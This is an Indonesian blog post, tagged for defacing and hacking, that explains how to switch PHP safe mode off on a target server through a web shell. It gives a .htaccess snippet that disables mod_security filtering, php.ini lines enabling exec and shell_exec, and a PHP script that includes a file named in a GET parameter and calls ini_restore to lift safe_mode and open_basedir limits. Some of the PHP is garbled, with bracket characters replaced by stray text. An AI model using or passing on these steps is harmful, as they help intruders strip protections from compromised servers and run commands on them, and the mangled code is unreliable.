Mengubah Shell Safemode ON to OFF

Cara merubah target/shell Safemode ON menjadi OFF

1. mengubah atau membuat file .htaccess

<IfModule mod_security.c>     SecFilterEngine Off     SecFilterScanPOST Off </IfModule>

2. menggunakan php.ini

safe_mode = off
exec = On
shell_exec = On

3. menggunakan ini.php

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>

Sumber : BKHT
Tag : Defacing, Hacking

Related Post:

0 Komentar untuk "Mengubah Shell Safemode ON to OFF"

Post a Comment

Back To Top